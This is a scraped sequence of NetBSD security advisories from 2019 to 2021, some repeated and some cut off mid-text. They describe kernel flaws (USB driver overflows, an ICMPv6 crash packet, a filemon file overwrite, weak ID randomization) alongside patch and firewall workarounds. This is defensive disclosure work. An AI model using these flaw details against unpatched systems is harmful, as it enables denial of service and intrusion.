available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2021-NNN.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/. Copyright 2021, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2021-002.txt,v 1.1 2021/07/14 17:48:26 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJg7yNrAAoJEIkmHhf170n/MNwP/iD+dkuOVX5GVL+eSiCyCBAa kHZbyg8jMNTJB636b8/gwDl7Jf0x8K+B/2jAeO2wrYwBzSPtlpI4K/6cQrjQ8Yc8 DasPy2x0qmaWZc744/2MlVieStD0bNHS6uw+Fm+MFPeNtecVNg94Qsbs7tzqK1dw PueRPkRSafBkdmlffrmKNDASUZv2fUgOPL360Up8vIyfa3V1OAoCrJ18pIFjjiso rHzPXlLhc+DonvNwxzsk3JbGpkyC8URUhJ7r666Z2w2TWWfKOnJFhJvR2uw+yN1K v+2r1o+QpZMKw2xj4vvep+aefWxvyxmIBTgq/6vfiSOEx6TUFru6hgP11U+wnvBi lTdAWs9KNshE5/7yM60QrT9b72hPe1RvQn3CEn/ojVn9Xc3e9rWQaC/PV/ZqjxBl
NetBSD Security Advisory 2021-001: Predictable ID disclosures in IPv4 and IPv6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2021-001 = Topic: Predictable ID disclosures in IPv4 and IPv6 Version:NetBSD-current: affected NetBSD 9.1: affected NetBSD 8.2: affected Severity: Possible data exfiltration from firewalled or NATed networks Fixed: NetBSD-current: March 9, 2021 NetBSD-9 branch:March 9, 2021 NetBSD-8 branch:March 9, 2021 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract IP ID randomization was not enabled by default and the randomization algorithms were not strong enough. Technical Details = 1. IPv4 and IPv6 fragment ids were not randomly generated by default. Furthermore the randomization algorithms were not strong enough. 2. The TCP ISS random generation had an information leak. 3. The IPv6 flow label generation algorithm was not strong enough. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The following revisions fix the issues: src/sys/netinet/in_var.h1.99,1.102 src/sys/netinet/ip6.h 1.30 src/sys/netinet/ip_input.c 1.400 src/sys/netinet/tcp_subr.c 1.285,1.286 src/sys/netinet/tcp_timer.c 1.96 src/sys/netinet6/ip6_id.c 1.20 src/sys/netinet6/ip6_var.h 1.88 The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/netinet sys/netinet6 # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Amit Klein for reporting these vulnerabilities and Taylor R. Campbell for fixing them. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2021-001.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2021, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJgSn73AAoJEIkmHhf170n/jpYQAKzk+vo/CDcYchOk+/wgPhBL TbG6rxD3xAVD1aH/sz1lviYTBE5i3W+RohJtZtvUAEoSivFuAODw3TYH/S+KWhDY IyZ1shNICPTqB1dCrgjiQpmOq9fYQ4i0zpGHhvkqWGjWXMnN2nMy37fPvsZ2TvG2 WrwKThptM8Ls6aB+K4Fg0NcHW6ifdvbXY5r2ddXftoT+zsbW9mclfu9spsAHQtLh I11GedEU7BOsvT/woFW6mG3VsHPUXofaC5BTINEiJq1o/VE9HoRmhp05Ik+NCwCv BTzLrKmpOkMJzPp3wvOE2TeolyG57rw1LrHHh6Y/Zb4BIJb6mDP03xuaulRvHg/i D27/p8qvK4lxSVQtwci15TUa45MbW/nAGMgDEPuMHxEAxwqcfZtdlTiCSSSUuVZV BxBaW6hB1gTpkNxmtMt7H0W09xbfgztQndHlZaWv2vTeOlHHKO6298C43g12PS/M pGd3XD3e1hrdrxjtfmiA8oZgOqCM6GJdGpaxE6sBWsVHNyNVurgGI1h5orW9OzO1 vuK6iwq8AZtIp5s/IFddbdFyTNGuzc4gdNx/ON9CnuJRTJ5pWEABYH25imf3fcfU wRqpGwB2oOMdKnQ56o0qMykuSurXbJNM65R3xlijjuZrclt7cr6Kz3uO+zRr0yGM 1MAq4vRQavtS6+04kZiV =Oxq5 -END PGP SIGNATURE-
NetBSD Security Advisory 2021-001: Predictable ID disclosures in IPv4 and IPv6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2021-001 = Topic: Predictable ID disclosures in IPv4 and IPv6 Version:NetBSD-current: affected NetBSD 9.1: affected NetBSD 8.2: affected Severity: Possible data exfiltration from firewalled or NATed networks Fixed: NetBSD-current: March 9, 2021 NetBSD-9 branch:March 9, 2021 NetBSD-8 branch:March 9, 2021 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract IP ID randomization was not enabled by default and the randomization algorithms were not strong enough. Technical Details = 1. IPv4 and IPv6 fragment ids were not randomly generated by default. Furthermore the randomization algorithms were not strong enough. 2. The TCP ISS random generation had an information leak. 3. The IPv6 flow label generation algorithm was not strong enough. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The following revisions fix the issues: src/sys/netinet/in_var.h1.99,1.102 src/sys/netinet/ip6.h 1.30 src/sys/netinet/ip_input.c 1.400 src/sys/netinet/tcp_subr.c 1.285,1.286 src/sys/netinet/tcp_timer.c 1.96 src/sys/netinet6/ip6_id.c 1.20 src/sys/netinet6/ip6_var.h 1.88 The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/netinet sys/netinet6 # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Amit Klein for reporting these vulnerabilities and Taylor R. Campbell for fixing them. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2021-001.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2021, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJgSn73AAoJEIkmHhf170n/jpYQAKzk+vo/CDcYchOk+/wgPhBL TbG6rxD3xAVD1aH/sz1lviYTBE5i3W+RohJtZtvUAEoSivFuAODw3TYH/S+KWhDY IyZ1shNICPTqB1dCrgjiQpmOq9fYQ4i0zpGHhvkqWGjWXMnN2nMy37fPvsZ2TvG2 WrwKThptM8Ls6aB+K4Fg0NcHW6ifdvbXY5r2ddXftoT+zsbW9mclfu9spsAHQtLh I11GedEU7BOsvT/woFW6mG3VsHPUXofaC5BTINEiJq1o/VE9HoRmhp05Ik+NCwCv BTzLrKmpOkMJzPp3wvOE2TeolyG57rw1LrHHh6Y/Zb4BIJb6mDP03xuaulRvHg/i D27/p8qvK4lxSVQtwci15TUa45MbW/nAGMgDEPuMHxEAxwqcfZtdlTiCSSSUuVZV BxBaW6hB1gTpkNxmtMt7H0W09xbfgztQndHlZaWv2vTeOlHHKO6298C43g12PS/M pGd3XD3e1hrdrxjtfmiA8oZgOqCM6GJdGpaxE6sBWsVHNyNVurgGI1h5orW9OzO1 vuK6iwq8AZtIp5s/IFddbdFyTNGuzc4gdNx/ON9CnuJRTJ5pWEABYH25imf3fcfU wRqpGwB2oOMdKnQ56o0qMykuSurXbJNM65R3xlijjuZrclt7cr6Kz3uO+zRr0yGM 1MAq4vRQavtS6+04kZiV =Oxq5 -END PGP SIGNATURE-
NetBSD Security Advisory 2020-003: USB network interface jumbo packets
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2020-003 = Topic: USB network interface jumbo packets Version:NetBSD-current: affected prior to 2020-08-28 NetBSD 9*: affected NetBSD 8*: affected Severity: Devices on LAN can corrupt kernel memory Fixed: NetBSD-current: 2020-08-28 NetBSD-9 branch:2020-08-28 NetBSD-8 branch:2020-08-28 Please note that NetBSD releases prior to 8.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Some USB network interface drivers are missing a bounds check, without which data from the network may be copied past the end of an array allocated in a kernel mbuf cluster. This enables a network device on the same LAN to corrupt kernel memory. The affected USB network interfaces are: - - atu(4) - - axe(4) - - axen(4) - - otus(4) - - run(4) - - ure(4) Technical Details = Not all USB network interface drivers are affected: some don't handle USB transfers larger than the kernel mbuf cluster size (MCLBYTES, usually 2048). * netbsd-8 The following drivers are vulnerable in netbsd-8: - - atu(4) [fixed in netbsd-8 if_atu.c 1.55.8.4 2020-08-28] - - axe(4) [fixed in netbsd-8 if_axe.c 1.82.6.5 2020-08-28] - - axen(4) [fixed in netbsd-8 if_axen.c 1.11.8.9 2020-08-28] - - otus(4) [fixed in netbsd-8 if_otus.c 1.31.2.3 2020-06-16] - - run(4) [fixed in netbsd-8 if_run.c 1.22.2.3 2020-06-16] The following drivers were audited and do not appear to be affected in netbsd-8: - - athn(4) - drops packets larger than MCLBYTES - - aue(4) - transfers only up to AUE_BUFSZ=1536 bytes - - bwfm(4) - transfers only up to BWFM_RXBUFSZ=1600 bytes - - cdce(4) - transfers only up to CDCE_BUFSZ=1542 bytes - - cue(4) - transfers only up to CUE_BUFSZ=1536 bytes - - kue(4) - transfers only up to KUE_BUFSZ=1536 bytes - - rum(4) - transfers only up to MCLBYTES - - smsc(4) - drops packets larger than MCLBYTES - - udav(4) - transfers only up to UDAV_BUFSZ=UDAV_MAX_MTU=1536 bytes - - upgt(4) - transfers only up to MCLBYTES - - upl(4) - transfers only up to UPL_BUFSZ=1024 bytes - - ural(4) - transfers only up to MCLBYTES - - ure(4) - no ure(4) in netbsd-8; only added in netbsd-9 - - url(4) - transfers only up to URL_BUFSIZ=1535 bytes - - urndis(4) - transfers only up to RNDIS_BUFSZ=1562 bytes - - urtw(4) - transfers only up to MCLBYTES - - urtwn(4) - drops packets larger than MCLBYTES - - zyd(4) - transfers only up to MCLBYTES (plus header and trailer, not in mbuf) * netbsd-9 The following drivers are vulnerable in netbsd-9: - - atu(4) [fixed in netbsd-9 if_atu.c 1.65.2.1 2020-08-28] - - axe(4) [fixed in netbsd-9 usbnet.c 1.25.2.5 2020-08-28] - - axen(4) [fixed in netbsd-9 usbnet.c 1.25.2.5 2020-08-28] - - otus(4) [fixed in netbsd-9 if_otus.c 1.38.2.1 2020-06-11] - - run(4) [fixed in netbsd-9 if_run.c 1.32.4.1 2020-06-11] - - ure(4) [fixed in netbsd-9 usbnet.c 1.25.2.5 2020-08-28] The following drivers were audited and do not appear to be affected in netbsd-9: - - athn(4) - drops packets larger than MCLBYTES - - aue(4) - transfers only up to AUE_BUFSZ=1536 bytes - - bwfm(4) - transfers only up to BWFM_RXBUFSZ=1600 bytes - - cdce(4) - transfers only up to CDCE_BUFSZ=1542 bytes - - cue(4) - transfers only up to CUE_BUFSZ=1536 bytes - - kue(4) - transfers only up to KUE_BUFSZ=1536 bytes - - mue(4) - drops packets larger than MCLBYTES - - rum(4) - transfers only up to MCLBYTES - - smsc(4) - drops packets larger than MCLBYTES - - udav(4) - transfers only up to UDAV_BUFSZ=UDAV_MAX_MTU=1536 bytes - - umb(4) - uses m_devget rather than just MCLGET - - upgt(4) - transfers only up to MCLBYTES - - upl(4) - transfers only up to UPL_BUFSZ=1024 bytes - - ural(4) - transfers only up to MCLBYTES - - url(4) - transfers only up to URL_BUFSIZ=1535 bytes - - urndis(4) - transfers only up to RNDIS_BUFSZ=1562 bytes - - urtw(4) - transfers only up to MCLBYTES - - urtwn(4) - drops packets larger than MCLBYTES - - zyd(4) - transfers only up to MCLBYTES (plus header and trailer, not in mbuf) * HEAD The following drivers are vulnerable in HEAD: - - atu(4) [fixed in if_atu.c 1.73 2020-08-28] - - axe(4) [fixed in usbnet.c 1.39 2020-08-28] - - axen(4) [fixed in usbnet.c 1.39 2020-08-28] - - otus(4) [fixed in if_otus.c 1.45 2020-06-11] - - run(4) [fixed in if_run.c 1.41 2020-06-11] - - ure(4) [fixed in usbnet.c 1.39 2020-08-28] The following drivers were audited and do not appear to be affected in HEAD: - - athn(4) - drops packets larger than MCLBYTES - - aue(4) - transfers only up to AUE_BUFSZ=1536 bytes - - bwfm(4) - transfers only up to BWFM_RXBUFSZ=1600 bytes - - cdce(4) - transfers only up to CDCE_BUFSZ=1542 bytes - - cue(4) - transfers only up to CUE_BUFSZ=1536 bytes - - kue(4) - transfers only up to
NetBSD Security Advisory 2020-002: Specific ICMPv6 error message packet can crash the system
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2020-002 = Topic: Specific ICMPv6 error message packet can crash the system Version:NetBSD-current: affected untill January 23, 2020 NetBSD 9.0: not affected NetBSD 8.1: affected NetBSD 7.x: not affected Severity: Remote packets can crash the machine Fixed: NetBSD-current: January 23, 2020 NetBSD-9 branch:January 23, 2020 NetBSD-8 branch:January 23, 2020 NetBSD-7 branch:not affected Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Due to a mistake in IP-IP tunnel packet processing, a malicious ICMPv6 error message packet whose payload is an IP-IP tunnel packet can cause incorrect resource freeing leading to a system crash. This is a remote DoS, that affects all systems that have IPv6 enabled. Technical Details = NetBSD-7 is not affected since it does not use the resource that is erroneously being freed. Solutions and Workarounds = 1. Filter out ICMPv6 'packet too big'-type packets using NPF. Here's an example npf.conf file, assuming wm0 is the interface to be protected: $int_if = ifaddrs(wm0) group default { block in final on $int_if family inet6 proto ipv6-icmp icmp-type 2 all pass in on $int_if all pass out on $int_if all } Note that this workaround disables reception of packet-too-big icmp6 messages which are necessary for the host to perform pmtu discovery. If a remote host is on a network with a smaller MTU, IPv6 communication may not work properly. 2. Update the kernel to a fixed version and reboot. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P src/sys/netinet/ip_encap.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/docs/guide/en/chap-kernel.html The patches can be obtained from NetBSD-current with the following command: cvs rdiff -u -r1.71 -r1.72 src/sys/netinet/ip_encap.c Thanks To = Yasuhiro Ohishi for pointing out the problem. Kengo Nakahara for providing the fix. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2020-002.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2020, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2020-002.txt.asc,v 1.3 2020/03/11 02:33:04 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJeaE2fAAoJEIkmHhf170n/3FsP/00Wnw3rg9ykFcVZMO0B86eK VUWT1G3a+cDSAyUWlpXmNRTqIzsHBZYCjb+OMiI79Gwsa2IqED9QGiJRL5zaOzhk 3XhDzo3/ibIR2c+4F970At+t+C37EAVCbpQrQpIgFjM78M+Y9CiZXq2jvDqCzC/W XKhZ8t9EvwUdygQ5lT1IJXZb/uHpbewhNTwcqEbzdlXtNoSFaPmixJODGF82nhSa SW/AobdEv9GeHjNCBAtVpcvBTy4o/wbYxDmF5gH+5X6360abvOBRWCbTjjiL+ecK uQA9rDd1CDNaR+g4tjs1TtEFFdg1DfYOwtXyrgpa4t/EF9X3HaOGqlXxGyzjn4fJ SQbKvSYY4k/RFa7rQ7ACztuimjSswDvoGd0V1AmtkMflBXnUPsnN60DrueWjws0c Bab+kKXfnwVrrMoSqqHH1uVCJHxjsIUbsqo/gJP9mDskg6t1lmIrne2eIWh+MJ9b CPkas5i1vPRjj7+1w5vslQEaENPwN4gVAXtT45orRW5f0VNdFs79mvq9Xmqtd/xD rIrQu19oOMIEdswVQurkwvTJ1F3ul+mOVhrfSw/QS/RX++2upQ+q5ZEWKym7+9TQ MG+FFl410sob/jFIrExOIQU5YTdIdIs6XVAJzOgliirc221eAVnxOWo9qV03VqdW +DlHwc4pXmWep7qW8jGX =YhmF -END PGP SIGNATURE-
NetBSD Security Advisory 2020-001: Missing permissions checks for network ioctls
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2020-001 = Topic: Missing permissions checks for network ioctls Version:NetBSD-current: affected NetBSD 9.0_RC1: affected NetBSD 8.1: partially affected NetBSD 7.x: partially affected Severity: Local users can crash the machine Fixed: NetBSD-current: December 16, 2019 NetBSD-9 branch:December 17, 2019 NetBSD-8 branch:December 17, 2019 NetBSD-7 branch:December 17, 2019 Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Three network interface related ioctls that should have been only allowed for privileged users were not adequately protected. An unprivileged user can set network interface descriptions, get and set diagnostic data from some atheros interfaces, and retrieve descriptor information from umb (usb mobile network device). Technical Details = Specifically the following ioctls were missing permissions checks: IOCTL FUNCTIONIFACE VERSION HOW - --- SIOCGATHDIAGath_ioctl ath * get and set diagnostic info SIOCSIFDESCRifioctl_common * 9,CUR set the interface description SIOCGUMBINFOumb_ioctl umb 9,CUR get descriptor info/potentially contains username/password Solutions and Workarounds = Update the kernel to a fixed version and reboot. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P src/sys/dev/ic/ath.c # cvs update -d -P src/sys/dev/usb/if_umb.c # cvs update -d -P src/sys/net/if.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/docs/guide/en/chap-kernel.html The patches can be obtained from NetBSD-current with the following commands: cvs rdiff -u -r1.128 -r1.129 src/sys/dev/ic/ath.c cvs rdiff -u -r1.9 -r1.10 src/sys/dev/usb/if_umb.c cvs rdiff -u -r1.465 -r1.466 src/sys/net/if.c Thanks To = Ilja Van Sprundel for reporting this vulnerability. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2020-001.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2020, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2020-001.txt.asc,v 1.1 2020/01/21 16:08:16 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJeJyHcAAoJEIkmHhf170n/uDMP+gIwylZuuX0DQFIBtPI7KFnu /C7oJJ6mzk823iSlNxhew2WBoawyUEHeOm6hDUGQfokgCZX2DCTfhXMgdbFm9Nfk 2GQpwqVyZMUlA6UxYRm0fPtywksn5+z5JarwA2SqAk/jwZKb59baf9xDOPlzXHRJ JdzGLGC9CdRMvghlb4a/P5v+0FAEKbf0roEtEMMtDwB3JbYI0F0KRc0xqvuRP2N9 UFfgEkIh0Dgz8Np0aZQdyh513L8r6y5sWDnjuT2RmA7PWUAz64FzOYBAYSP253wG pBkUkQ9Z8wFVN3LDuOspjMxkj8pT2SvI9iq5DHYllDAqeHY8rA4E4/EVty0KDfm8 o3uHk3PJq/ngEJ6QW8dkDfsZNS3WlRkysYuVuEZ3fcIn25GgN228/CDmS0CbZ6eI KUn7N8DEB2zQN2HGiso0gm+/EOUxGE6F5IBCmhxG5Vynh7gaUSHjZFYLpIvPur/s tLZALUZ4bi0T/FVYgOdGp9Wn+Dnc5aa2xsEYBn+ytpcdu/GnS2cEoIhJ+I3Bi9s6 NTUlqqSZNzanCbpAWhxQWAedVbQ4dgwHmVF/EsDy29koFiBWEJStkUlsnv8+p0xj ypbGclNtDWBZ/cmdYysbGcHx0s8mZabDuCJvWfudLICVzHaRjoVWySo1ePqK+AVQ
NetBSD Security Advisory 2019-006: Denial of service and possible privilege escallation in filemon
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2019-006 = Topic: Denial of service and possible privilege escallation in filemon Version:NetBSD-current: affected up to 9.99.17 NetBSD 8.1: affected NetBSD 7.x: unaffected Severity: Local users can crash the machine Fixed: NetBSD-current: October 28, 2019 NetBSD-9 branch:October 28, 2019 NetBSD-8 branch:October 28, 2019 Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An unprivileged user can write filemon output to arbitrary files, or crash the system. Technical Details = The filemon module is experimental and not suitable for general use. Unfortunately it can be inadvertently auto-loaded when /dev/filemon is opened, and /dev/filemon is accessible to any user. There was a missing write check in the filemon module thus permitting any user to overwrite any file in the system. While we are not currently aware of an exploit, it is conceivable that one can overwrite a configuration file parsed by a privileged daemon that does not abort on syntax errors. Additionally the way filemon does filesystem interception is racy and can lead to random crashes if the system calls are in use while the module is unloaded. Solutions and Workarounds = Unloading and removing the filemon module, either manually: # modunload filemon # rm -rf /stand/*/*/modules/filemon/ Or by updating the machine to a newer build and running postinstall fix obsolete Thanks To = Ilja Van Sprundel for reporting this vulnerability. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-006.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2019, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2019-006.txt.asc,v 1.1 2019/12/17 00:55:08 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJd+CdCAAoJEIkmHhf170n/sRwP/iepxkQCzWM7NUSZWDmbJ6A2 pJzJVlmwOwqqvRFlPWhfiLAryeWIaM6mO4mCdqQUodvZGE8+9q9/1Qyga41YQji5 mYCiFCAM1ezUzhr9FXHsJZf8rvEp6qt9E7DjqNpzJy9ut9bSEMLVq3M4GLqcQZn3 t2067Cl0OIkOrenxU5aM5cYuQe62DotQR254HmGKGzG5SbNOM9Q1fLJECNECRFt2 7N72RsOcDMnEKepVoFcH200oMKM5/tgweRKTxcrq3NsrFORSwgpobSN1Q2g5Uzc3 +PvB7wsy2xb1XbHT7VYn+vspbrzlSDm+vrQCTNPUm26iOnyvl4XdFPOXwlUuHSXk GU2m5uqX3KvWkU4DDVhZ5DRmQHi8tY0sri53qvI0sazOlKtHau+qt0TI6pbizhPV o7CBsTytvw1ztL0q4g4pweRHiIT+jILTfeAaojNLAqDnLgzm4lBcUzg5WX552lCx vNb+2B6WHmIbAx/Jtr60ei97PWQVJ8ECckyrh+vvo2dD/izJg8JkB1rJa1ihydtu bvv3+MHO24wwBjlfcnoPvOETcakMRRH3Fkp9CNRx894eTn8bwrz3xPtyAhAwqzuc z2s/9foAs53wneKlnT6BCtUMx9v6FVT+9oOUmYGnQ7OneqZMKTSDHj2WsJEQNHXP 5Zkm7k2HHV6xcFF7tAo6 =uQGc -END PGP SIGNATURE-
NetBSD Security Advisory 2019-005: Sysctl RNG Key Erasure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2019-005 = Topic: Sysctl RNG Key Erasure Version:NetBSD-current: affected prior to 2019-11-25 NetBSD 8*: affected NetBSD 7.2*:affected NetBSD 7.1*:affected Severity: Retroactive disclosure of cryptographic keys until reboot Fixed: NetBSD-current: 2019-11-25 NetBSD-7 branch:2019-11-25 NetBSD-8 branch:2019-11-25 NetBSD-7 branch:2019-11-25 NetBSD-7-2 branch: 2019-11-25 NetBSD-7-1 branch: 2019-11-25 Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract The algorithm used by one of the kernel's cryptographic random number generation interfaces, the kern.arandom sysctl, failed to erase past states, and therefore failed to provide what is sometimes called backtracking resistance or forward secrecy. Thus, an adversary who could disclose kernel memory could retroactively predict past outputs of this random number generator. Technical Details = The sysctl node kern.arandom is designed to return uniform random bits fit for use as cryptographic keys. The libc arc4random(3) function uses kern.arandom to seed userland pseudorandom number generators, and various applications may use libc arc4random(3) to generate keys. The arc4random(3) security model asserts that: An attacker who has seen the library's PRNG state in memory cannot predict past outputs. However, owing to a mistake in the implementation of kern.arandom, an attacker who has disclosed the kernel PRNG state used by kern.arandom can predict past outputs of kern.arandom, in violation of the security property we intended to guarantee. The problem is limited to kern.arandom, and does not affect /dev/random, /dev/urandom, or kern.urandom. Solutions and Workarounds = Update the kernel to a fixed version and reboot. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp https://nyftp.netbsd.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/kern/subr_cprng.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Taylor `Riastradh' Campbell caused, found, and fixed the bug. Revision History 2019-11-26 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-005.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2019, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2019-005.txt.asc,v 1.1 2019/11/26 18:35:15 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJd3XBWAAoJEIkmHhf170n/aaoQAKfSq0VicDelAFYw7t1H0a0u bby6sL+ZXTQRw9RJO/8HJH9uCuigDSJA/bdJd5AOWvEQ9c1BWwv19qHZgIgOWGtJ 86CG85Tjb05KSd6+OMhT0uU7Q5ilzmSFMGsdp1oDvqYss6ewbqCk4hnqTPn/iWeJ 5ArJeNeKomn4OOoM/aEjh/SKoi3TE1wJ5333GUdc6mlm1j8mwn67VI8BxkzjPf2+ 3a0LJJ12zpbCzLvS/vmWkV4W+o9cv8wecvudJ9ltttPJRLHApU5keiaP2goAylzc DJmbARgkJWKmIcvoWIqQvoBhHDmzHDkjjrLQonozwf/ZwVZjQtCrApoxoHoQTASl tbDXebyL+ddOOLlpDRccPTN5yLPxGwaOf0hexIjcTKmgHYpBILaITGidKcmPvCWP bK5Mqsbu8/yhPzz89zv/YuwZ46FiES4ubhn2Rt9AXHaSqPnLAWPhugNCkwFJqQE7 9oe0g6Sr3r7vbJQUxZlLwc/zQQUvuAvbIrwNUbNQS7FZ3ItSLkvqS5nVB+ip2MWS
NetBSD Security Advisory 2019-004: IPv6 neighbor cache leak on expiration
